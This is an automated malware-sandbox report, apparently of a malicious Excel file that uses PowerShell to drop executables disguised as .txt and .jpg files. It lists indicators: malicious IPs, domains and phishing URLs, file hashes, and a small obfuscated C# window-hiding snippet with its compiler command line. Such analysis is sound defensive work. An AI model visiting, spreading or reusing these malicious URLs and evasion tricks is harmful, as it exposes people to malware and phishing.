                                                                                                                                                      • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, arc.msn.com.nsatc.net, config.edge.skype.com.trafficmanager.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      09:40:19API Interceptor35x Sleep call for process: powershell.exe modified
                                                                                                                                                      09:40:45API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                      09:41:00API Interceptor539x Sleep call for process: Test3.jpg modified

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      192.185.236.165Telex06012020.xlsGet hashmaliciousBrowse
                                                                                                                                                      • lankarecipes.com/mages.jpg

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      lankarecipes.comTelex06012020.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.236.165

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      DEDIPATH-LLCUSX8yhUJB4xd.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.15.143.234
                                                                                                                                                      SecuriteInfo.com.Trojan.Siggen11.57077.29929.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.15.143.195
                                                                                                                                                      vJHWQgfJ23.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.12.110.193
                                                                                                                                                      Pago Fecha 2021.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 45.81.7.81
                                                                                                                                                      #U00d6deme.exeGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.22
                                                                                                                                                      remittance for the month of Dec.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 45.15.143.142
                                                                                                                                                      SecuriteInfo.com.Generic.mg.5188c198e093757a.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.15.143.142
                                                                                                                                                      PICTURE SLIDE.exeGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.22
                                                                                                                                                      New Import and Export Regulation.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 161.8.142.134
                                                                                                                                                      fdwv4hWF1M.exeGet hashmaliciousBrowse
                                                                                                                                                      • 213.59.119.203
                                                                                                                                                      svchost.exeGet hashmaliciousBrowse
                                                                                                                                                      • 161.8.142.134
                                                                                                                                                      jEgLNI40Ro9O775.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.196.0.243
                                                                                                                                                      Gxuerxdose.exeGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.32
                                                                                                                                                      x472st8RLb.exeGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.32
                                                                                                                                                      FmhsHF4JR9.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.15.143.142
                                                                                                                                                      BxEz8S5iu3.exeGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.211
                                                                                                                                                      nocryt.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.76
                                                                                                                                                      inter.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.76
                                                                                                                                                      nocryt.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.76
                                                                                                                                                      inter.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.76
                                                                                                                                                      UNIFIEDLAYER-AS-1USTelex06012020.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.236.165
                                                                                                                                                      ul9kpUwYel.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.194.191
                                                                                                                                                      ______.docGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.151.24
                                                                                                                                                      ______.docGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.151.24
                                                                                                                                                      http://0620218.unfreezegrowers.com/bGVhaC5oZWl0bmVyQGV4cC5jb20=Get hashmaliciousBrowse
                                                                                                                                                      • 162.241.175.181
                                                                                                                                                      http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.comGet hashmaliciousBrowse
                                                                                                                                                      • 50.87.150.0
                                                                                                                                                      https://1drv.ms/u/s!AmqlOnt-7_dxdENKsoSwOCjxG_Q?e=3ZrXeGGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.127.190
                                                                                                                                                      https://cypressbayhockey.com/NOGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.120.89
                                                                                                                                                      https://pdfsharedmessage.xtensio.com/7wtcdltaGet hashmaliciousBrowse
                                                                                                                                                      • 108.179.246.23
                                                                                                                                                      form.docGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.148.243
                                                                                                                                                      RFQPO90865802ICONME.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.131.105
                                                                                                                                                      Ekz Payment.htmGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.196.146
                                                                                                                                                      http://moneypay.best/Get hashmaliciousBrowse
                                                                                                                                                      • 192.232.250.4
                                                                                                                                                      https://canningelectricinc.wordpress.com/Get hashmaliciousBrowse
                                                                                                                                                      • 192.185.188.96
                                                                                                                                                      Lmcgrath - FAX_ALNRSUW.htmlGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.29.156
                                                                                                                                                      Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 108.167.141.199
                                                                                                                                                      W08347.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.117.218
                                                                                                                                                      https://datetheright1.com/damn/sharepoint%20newGet hashmaliciousBrowse
                                                                                                                                                      • 162.144.40.98
                                                                                                                                                      http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/Get hashmaliciousBrowse
                                                                                                                                                      • 162.241.101.253
                                                                                                                                                      8G9b9FXspm.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.219.113

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\6F929868-7C3F-4808-A89F-5BECCA241772
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):132942
                                                                                                                                                      Entropy (8bit):5.3729511389077285
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:TcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:XrQ9DQW+zBX8P
                                                                                                                                                      MD5:BB7821180C56896263A4E3D624E9851B
                                                                                                                                                      SHA1:19BC0AE70A906B3824FDCE1B6EE108CEE340B416
                                                                                                                                                      SHA-256:6B4AD69C0F7F1259DE7C6080B980B269623849954559ED507415C0E44A799C8C
                                                                                                                                                      SHA-512:BEE6FD93C66FCADE929119B19F78D3A1235F477DD7A935DE8F4FEB8A77AAA6274B85E3BE0B6D0CBFEF6F5FB6EA8CC244A917EB649CC2959488FB2D10BDD146FA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-08T08:39:54">.. Build: 16.0.13706.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):33555
                                                                                                                                                      Entropy (8bit):5.02521092294607
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:qzV3IpNBQkj2Lh4iUxtaHard3/Fn6/zFtFgVx1UtRj7vioBnPVe7oZtU9OdB5tAd:qzV3CNBQkj2Lh4iUx+qdP56/zFzgVx15
                                                                                                                                                      MD5:1EE9CD5AFE273BCB1273CD14AAD12A24
                                                                                                                                                      SHA1:FFB214AEB1C1A1B635AAD1BD60F370C24F5AE99F
                                                                                                                                                      SHA-256:2A43414EC0CAC2908FFE7F42607C18ED01AEEBEB1F39AE971ED8A29F9ACC77BC
                                                                                                                                                      SHA-512:DB88734EF7070AA26D9EB5E3A1F526E9A2D49B93A99EA89C5C47BF3003E16B5BBDA7397ABC8093D3F33D42573DD80FCDD60654C6619F5FCE4E90213746DEE6D5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: PSMODULECACHE.#....a.)...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........o.8...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet...........'...C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):19692
                                                                                                                                                      Entropy (8bit):5.612455869249591
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:ytksZVBwVq3piwlz/7iSBKngulBILC779TISJQpay6mp+4sY4:/qYwlrG4KgulBIUIRGw4
                                                                                                                                                      MD5:51DDE5249B286B52EF9229912AD98618
                                                                                                                                                      SHA1:3D916E4BB19F01F03DFB921438B1156101360FF6
                                                                                                                                                      SHA-256:E6561BE6AF9EB609C38DDDA1C826753D8CF4114B2A6368AC9630AC7E7D9AD4BC
                                                                                                                                                      SHA-512:778353F136AD386FC14D8A78138CAF28E482891B7954B31B96710596834A54722A512BF226AD9749CE205D64F4095FBF50902043348E18A98E77C45BDFCE81DD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: @...e.......................!...........+............@..........H...............<@.^.L."My...:O..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].U.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1AA10000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):115669
                                                                                                                                                      Entropy (8bit):7.925918362600709
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:xGjHzSJtwYold/FMeHxvPnelLDCfXoCFOhT:8DIwYoLH9PnedDCfLAhT
                                                                                                                                                      MD5:980EDB1D4E3A2AA7CC8E148A7ADD557C
                                                                                                                                                      SHA1:F1B82D663987C46715DEEACD8313E8BC6376A7DE
                                                                                                                                                      SHA-256:4708FF793B68858E5A580A5BC704A2E58D6FB6906F2A48A272AB361BC18FFB45
                                                                                                                                                      SHA-512:B46B6502C4B370110236EA1C5FDDFD22CE502869157596D39A8E958EB6ED0D6736F1E392E2025679EA4B1AC0164272036479F4A2EE144751D44159F95E2493E8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .U.N.1..#...\.L.H..N9......4q..l......."P.F .........?.YS.@D.]......I.......>e.&.0.A...|...........l.R8........p...hE..8.A...?..N....Ku..l...x6......v..X..T-.!.-E".../$.......%..C..p...iB....!%*.._...`..T.,....D0.M...2K18......rd...[ja...;..........t.......X.L.i.g..2.+'..(&.{W..../......G...\PW..q.FY.w.q.j.B..?.Ht....w...........]..`VQ..!..?.w......]..itF.^.....u .I.j.;.+F..?...`W..p..#.........PK..........!.;.!............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RESBD2F.tmp
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2188
                                                                                                                                                      Entropy (8bit):2.7180858502310796
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:pg0BC93hHIWhKoXffI+ycuZhNUvfakSHvYPNnq92pGzW9I:K0BC9RoMKgH1ul0a3Yq9h
                                                                                                                                                      MD5:1A21F29FE75C935E4D9DAB3AF862AD14
                                                                                                                                                      SHA1:1E7E91823764C94F4BA9BB133C6AC97A05B4F712
                                                                                                                                                      SHA-256:8C44258ECD4FCA0C5F85C753462B86167D32AB68670ABAD8A907D80200442160
                                                                                                                                                      SHA-512:0622D2017B70B82514213E65CB6D23C6224412FE7A202AB5AE76DAB1D9B06BE0BB2984332259FF7BCBEE417C614123AE8F1DAEEA40BC0F2DDB34E8DCBD1E4F74
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T....c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP..................q.k.>.................4.......C:\Users\user\AppData\Local\Temp\RESBD2F.tmp.-.<...................'...Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Documents.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Test1.txt
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1691648
                                                                                                                                                      Entropy (8bit):7.901599109868755
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:OGs56nQsgC/2Bo5dcW/McLiyKQJpDEGKHh0jXJ:mEOIdcYfLiyKQzD9c0jZ
                                                                                                                                                      MD5:977BE4BFD3F8EBD3F7EF56DCE06046CA
                                                                                                                                                      SHA1:D79746B09430C99F01729AE6C447D54EA9434546
                                                                                                                                                      SHA-256:0ACBF142760FA262369C7DB70A8284D2320496D461D468011D5316E00A725382
                                                                                                                                                      SHA-512:029357805FB41267326313D3BC5C2770505C215261992A8B06211E5093CC89F4DED3ADD470D443273874AF5BF0E49DDFF5B86365A9504A308FA7A432E8DD8794
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...E%..r...<!..v...s...q...Richs...........................PE..L......_.................p...P....................@.........................................................................L...P.......................................................................................t............................text...D`.......p.................. ..`.rdata..............................@..@.data...H...........................@....rsrc...............................@..@.reloc..j........ ..................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Test2.gif
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:PNG image data, 843 x 685, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):52573
                                                                                                                                                      Entropy (8bit):7.929770193106239
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:q8as4TUSrbfoAKgxCllllllhy8PZMPAW07jI:ETUkJkllllllhyKnI
                                                                                                                                                      MD5:BD077FF603FB6873277C658C2FA9F84B
                                                                                                                                                      SHA1:2F70973669FEABE962DA03DD4F4A25CE789EF7A1
                                                                                                                                                      SHA-256:12CE388F55373DBAA49259D196B2B692EF70A2CD1999406BB46D562AA9C56168
                                                                                                                                                      SHA-512:205C3E7CB055179F24CBA13BC381A358648221A37F1F05EFFBDE91814794941FFDCFB3D41567B3E86970683180570D4CE18CE4A49EA729202A989200A91737B7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR...K.........yLb.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..ix.....|I...^.{.3.af.xMH2q..$L2..'q...c[.1.........1.*.........hA.I......b..OuUWWWW..st$.Z./..T?U.Tuw...-.]..R..... .. ..RM.px.........@Jk6.>.9<:.....N.j. .. ..z.....&O8<.;.. .....rt......l.!.. ....(..Z...... .. (....;.A..A...t.9....g.....f,..c.o~t.C..8x......9..;........../....A..A.U....?uFj..&W.o>|..'_~.%...?.${.8.~....eD*...)........mYY..ef.e.n. e4i....m...[.n.s.=...>zBk.m.8q.. .. .IS....D.Z{.w.&.P..QE....N.YY.B...+W>.8y.c..G;....t..q_.FR..........u...SO=.~...H..++...b].._.H..,......OM..*.*+....S.z]M}.CG.k.:..u..k..W....*/)_S.Fk..p...A..ARd.._..'...s....{..;5.4.px/.-.|......O|.....u4..k.......c}...t4.e/...G..=..[.=wAF.....~.O..]{{.....}....^a~...TXWYUTPT..j.....s....#.W..Zm..v..S.~...G.!.w.....*.....4..8.)*....<Q.w.&.*.....O.......)[.-.(u....[..^......B5.8...a/....>....G.Z<..'#.K..............D"g...CP.Juf^..."..S.T.468<..........ON^..J..
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1744221
                                                                                                                                                      Entropy (8bit):7.905244958740085
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:OGs56nQsgC/2Bo5dcW/McLiyKQJpDEGKHh0jXJG/I:mEOIdcYfLiyKQzD9c0jZG/I
                                                                                                                                                      MD5:19387B30D6DBE83E31D3CAC884280D93
                                                                                                                                                      SHA1:6B3E69CA8EB1FAB3562069DDD536E17E9FDEB065
                                                                                                                                                      SHA-256:24376FC5EB6DF0EF9DC45BF80BE3B7C5FC05451C8838A237FB755C3DDDDF6A58
                                                                                                                                                      SHA-512:92E592CE199AECBF15FCF99834BC3A9B8DCC06C74F62B8364F7E4C303C3945619CACF8C9D66F0BD229ABAAB5FCF462852FA9FCF21C6679D4EF66A1373FD774B3
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...E%..r...<!..v...s...q...Richs...........................PE..L......_.................p...P....................@.........................................................................L...P.......................................................................................t............................text...D`.......p.................. ..`.rdata..............................@..@.data...H...........................@....rsrc...............................@..@.reloc..j........ ..................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjero14r.dsc.psm1
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 1
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqwk4ohh.b1d.ps1
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 1
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):652
                                                                                                                                                      Entropy (8bit):3.1049088739218784
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryiNMUfak7YnqqHNMUYPN5Dlq5J:+RI+ycuZhNUvfakSHvYPNnqX
                                                                                                                                                      MD5:DB7FD971D76BFC3E0B0782EF9BCFDCFD
                                                                                                                                                      SHA1:8E321D7EA427122870ADE8F110A6273E241385A6
                                                                                                                                                      SHA-256:6433DE3B63669C4BE0D0CE9C5FB3513117E632E299CAA254A1EA172E680408B3
                                                                                                                                                      SHA-512:44E202D3C7AD43A0A5B65D12985A46DC85490E395D054322654D79DD511DAF2DDEB71D066A76B39F517B56808D3E5018145E7124DEA2944C1D98E99CC62E3D73
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.w.a.h.a.3.c.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.w.a.h.a.3.c.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.0.cs
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:C++ source, UTF-8 Unicode (with BOM) text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):227
                                                                                                                                                      Entropy (8bit):4.717324531992703
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:V/DsYLDS81zumJFR66rMUSRkoSdt+imlwy:V/DTLDfuCRlrMf9Amlwy
                                                                                                                                                      MD5:45B27450C87DFD52C3202A5D753ACE9D
                                                                                                                                                      SHA1:A1994630E847E7105A17D99B84C0775AD5FF3082
                                                                                                                                                      SHA-256:1D49AB035313FBF58CF764BB0C20D9A3F891AFA4D6F2493092CE39A1864A70D3
                                                                                                                                                      SHA-512:A67DD616D149E95F9303633919B47ABEE3CE091C18266C2C2B7F8CE07615BF7EABE7AB4AD60A6E24FE63E68B7EECC31F5E0CA79F7DE7DB09E38685F0999DC89F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace nATIve.{. public class Win. {. [ DllImport ( ("use" + "r32" + ".dll" ) ) ] public static extern bool ShowWindow(int handle , int state) ; .. }..}.
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):369
                                                                                                                                                      Entropy (8bit):5.242580375842531
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fd/bKzxs7+AEszIWXp+N23fd/bv:p37Lvkmb6KHcWZE85
                                                                                                                                                      MD5:0E8245CB95F40B647C9CD4210D638CCE
                                                                                                                                                      SHA1:B8E9046F358FE425A421493E157A33F5E7B250D2
                                                                                                                                                      SHA-256:5456C47D4AAF84D1D487D016271DD8100BF193D529854B59209919B482FBF9B1
                                                                                                                                                      SHA-512:C7396FCA61E8E163FED6598AEB634E44573FC93BBC2E5241407A6BA1084727EE73E385AE6468BE812AB464D57830F17D5E3A89DA87A4C0F2CEB349209BE48B7C
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.0.cs"
